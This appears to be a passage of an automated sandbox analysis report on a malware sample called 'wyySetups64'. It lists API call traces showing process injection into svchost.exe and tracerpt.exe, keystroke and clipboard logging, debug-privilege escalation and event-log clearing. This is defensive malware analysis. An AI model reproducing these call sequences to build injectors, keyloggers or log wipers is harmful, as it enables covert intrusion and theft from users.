                                                                                                                                                                                                              • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                                                                                                              • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                                                                                                              • API String ID: 1637302245-2373594894
                                                                                                                                                                                                              • Opcode ID: 0553ea5704567323bddebd1e0cc127bb9c1efd58106411c99b5a50823920aa9f
                                                                                                                                                                                                              • Instruction ID: 18957eb963f647d9e5129e3ee8e58a6cd4954823ce5b41b65eb66f41bc488c6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0553ea5704567323bddebd1e0cc127bb9c1efd58106411c99b5a50823920aa9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88C1C274900709EFE734EF64DCC9BAABBACFB08700F04459AF65AD6285D7789584CB60
                                                                                                                                                                                                              Function 033777E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377804
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377850
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03377864
                                                                                                                                                                                                                • Part of subcall function 03378720: _vswprintf_s.LIBCMT ref: 03378731
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377893
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 033778DA
                                                                                                                                                                                                                • Part of subcall function 03377740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,033778FC), ref: 03377756
                                                                                                                                                                                                                • Part of subcall function 03377740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,033778FC,?,?,?,?,?,?,74DF0630), ref: 0337775D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337790A
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377923
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337793B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377944
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377956
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377959
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337796B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0337796E
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377980
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377983
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337798B
                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377992
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033779B4
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 033779CA
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 033779FF
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03377A1B
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03377A43
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03377A58
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,033776F0,00001000,00000000), ref: 03377A72
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03377A90
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03377AA1
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03377ABA
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03377AD6
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03377AE8
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03377AF1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                              • API String ID: 4176418925-3213446972
                                                                                                                                                                                                              • Opcode ID: 5dcc190ed11a8968de65ead4ec104ff1aab7f8516dddcbf1e59f145f84e3e168
                                                                                                                                                                                                              • Instruction ID: ef2c79e3460f971d2dbe383eea8204d6f267f4514c9ff1006419ea8390f002bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dcc190ed11a8968de65ead4ec104ff1aab7f8516dddcbf1e59f145f84e3e168
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C81AB71A40318BBEB31EB65DCC6FEF777CAF55B01F000499F208A6181DAB59A85CB64
                                                                                                                                                                                                              Function 00BD5820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5849
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5868
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD589D
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 00BD58B1
                                                                                                                                                                                                                • Part of subcall function 00BD59E0: _vswprintf_s.LIBCMT ref: 00BD59F1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00BD58E0
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00BD5928
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD594E
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD5968
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD5987
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD59A2
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD59C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                                                                                                              • API String ID: 2170139861-1986163084
                                                                                                                                                                                                              • Opcode ID: 7f357ba072bc857090fd5b0fbbb14f07b3d2abcfd96e757d81b72d703a432c45
                                                                                                                                                                                                              • Instruction ID: 11d5d3ca9b450deea00908394bcddca610665518a035eaf375c5d9b037f645d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f357ba072bc857090fd5b0fbbb14f07b3d2abcfd96e757d81b72d703a432c45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B84187B0A40348ABD730DF60DC95FAAB7F8EF54704F1045DDB64DAB281EBB49A848B54
                                                                                                                                                                                                              Function 03377E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377E73
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377E9F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377ED4
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03377EE8
                                                                                                                                                                                                                • Part of subcall function 03378720: _vswprintf_s.LIBCMT ref: 03378731
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 03377F15
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03377F65
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03377F92
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03377FAA
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03377FCC
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03377FEA
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03377FFF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                              • API String ID: 2170139861-2473635271
                                                                                                                                                                                                              • Opcode ID: fbcdf503b7dbf8d565d2570f6e828b915fdf3b041ef2bec219243f37c7cdfb86
                                                                                                                                                                                                              • Instruction ID: 0efddd24823af2a794ab3ab07f217c9a31700f6e9cf7aec40db31b292e8333da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbcdf503b7dbf8d565d2570f6e828b915fdf3b041ef2bec219243f37c7cdfb86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 844163B5A40358ABDB31EB61DCC5FEE77BCAB44700F0042D9F609E6280DAB59A85CF54
                                                                                                                                                                                                              Function 0337E4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,033A0D80,74DEE010,74DF2FA0,74DF0F00,?,03376028,?,?), ref: 0337E519
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A0D80,\DisplaySessionContainers.log,?,03376028,?,?), ref: 0337E529
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,033A0D80,?,03376028,?,?), ref: 0337E538
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03376028,?,?), ref: 0337E546
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03376028,?,?), ref: 0337E563
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,03376028,?,?), ref: 0337E56E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,03376028,?,?), ref: 0337E577
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(033A0D80,?,03376028,?,?), ref: 0337E58A
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,03376028,?,?), ref: 0337E597
                                                                                                                                                                                                              • DirectInput8Create.DINPUT8(?,00000800,03394934,033A1220,00000000,?,03376028,?,?), ref: 0337E5B2
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E665
                                                                                                                                                                                                              • GetKeyState.USER32(00000014), ref: 0337E672
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                                                                                                              • String ID: <$\DisplaySessionContainers.log
                                                                                                                                                                                                              • API String ID: 1095970075-1170057892
                                                                                                                                                                                                              • Opcode ID: 644e7532f0b3a29fdbc054878ca5cf5618fea044dd00ba79ea38cebe9bbcb3c1
                                                                                                                                                                                                              • Instruction ID: 39bd738932040f11f744bc905652a847c6230e02af6a0ab8774adb933c8971ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644e7532f0b3a29fdbc054878ca5cf5618fea044dd00ba79ea38cebe9bbcb3c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B641CD34B40609AFD724EFA8ECC9F9E7BA8EB48710F10444AF615DB284C676E801CB94
                                                                                                                                                                                                              Function 03377620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0337DFA4), ref: 03377637
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0337DFA4), ref: 0337763E
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0337765A
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377677
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377681
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0337DFA4), ref: 03377691
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377698
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 033776BA
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 033776C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                                                                                                              • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                                                                                                              • API String ID: 1802016953-1577477132
                                                                                                                                                                                                              • Opcode ID: 7e85a674188e04c771e0fb5d2b5cbd052515cb5f4d24d4191627ed1f2a2d565b
                                                                                                                                                                                                              • Instruction ID: 5559f4f63baab61f1b6dc90e07ac053824a390216aa85021e1efba4dd32ba59b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e85a674188e04c771e0fb5d2b5cbd052515cb5f4d24d4191627ed1f2a2d565b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45212171A4030CFBEB10EBA4DC8AFBF777CEB08701F41454AF605EA285DAB955448BA5
                                                                                                                                                                                                              Function 0338054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03380576
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0338058E
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0338059E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 033805AE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03380600
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03380615
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3290314748-423161677
                                                                                                                                                                                                              • Opcode ID: 3f32f1d3132cfcc097e72fc2d4289f4952ef9b19a556e309b304ac1ad6b20b05
                                                                                                                                                                                                              • Instruction ID: 0da4eb69cdb1198a8f6426857c563e51a79ab2cf51561822a51ce294c5fe833f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f32f1d3132cfcc097e72fc2d4289f4952ef9b19a556e309b304ac1ad6b20b05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E31AE72E4171EFBDB20EBA4DCC4AAFB7B8EB44745F140426E511E7040DB74AA08CBA0
                                                                                                                                                                                                              Function 03377B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                              • API String ID: 3435690185-3733053543
                                                                                                                                                                                                              • Opcode ID: f5c6d61a6e03915fbdf35c9edf01cd76353b99ebd9edc1cb7192700596aeeb9e
                                                                                                                                                                                                              • Instruction ID: c65be4b1da05fad45b0fc5cd99c206e623ff85a534d02d17ed4a5df62b685ae8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c6d61a6e03915fbdf35c9edf01cd76353b99ebd9edc1cb7192700596aeeb9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3115871A4020CEBDB14EFA4DC89FAF777CEB08701F41455AF905DB284DA759905C7A0
                                                                                                                                                                                                              Function 0337B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenEventLogW.ADVAPI32(00000000,033958BC), ref: 0337B3E7
                                                                                                                                                                                                              • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0337B3F2
                                                                                                                                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 0337B3F9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$ClearCloseOpen
                                                                                                                                                                                                              • String ID: Application$Security$System
                                                                                                                                                                                                              • API String ID: 1391105993-2169399579
                                                                                                                                                                                                              • Opcode ID: 3a42fb1bf29231aa3c0f7dabac58ebb20baa278d025b9a26dadbe66ae6bd2fd4
                                                                                                                                                                                                              • Instruction ID: 56971d59be1c9a05f58d0dd212cf57cd952209ae091aba221585f448a1398683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a42fb1bf29231aa3c0f7dabac58ebb20baa278d025b9a26dadbe66ae6bd2fd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFE0E53670A618DBF222EB05A8C871FF3E4FBC9306F05054BE94896204C63484858B96
                                                                                                                                                                                                              Function 031F660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf$_memset
                                                                                                                                                                                                              • String ID: :$@
                                                                                                                                                                                                              • API String ID: 1292703666-1367939426
                                                                                                                                                                                                              • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                                                              • Instruction ID: f437ff25ce60d917dc5b68a65ac45e916bef3be16ba3762f1a678065e1fa3059
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95315EB6D0021CABDB14CBE5CC85FEEB7B9FB88300F504219EA0AAB241E7746945CB54
                                                                                                                                                                                                              Function 03377740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,033778FC), ref: 03377756
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,033778FC,?,?,?,?,?,?,74DF0630), ref: 0337775D
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03377785
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 033777B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                                                              • API String ID: 2349140579-2896544425
                                                                                                                                                                                                              • Opcode ID: e4ccc0fbdc6df97e8a79a20a1dac739f66ce4f72828ca6d1a0eae5381b111eaf
                                                                                                                                                                                                              • Instruction ID: 90f5f83d7abd02ee94d61a5f2fdc14907cfa271533daabdcb13be77b6da8e480
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4ccc0fbdc6df97e8a79a20a1dac739f66ce4f72828ca6d1a0eae5381b111eaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91110071A4020CEBDB14DFA5D88ABFEB7B8EB48704F114559E505EB280DA799505CB60
                                                                                                                                                                                                              Function 00BD6815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD793D
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD7952
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00BE5350), ref: 00BD795D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00BD7979
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00BD7980
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
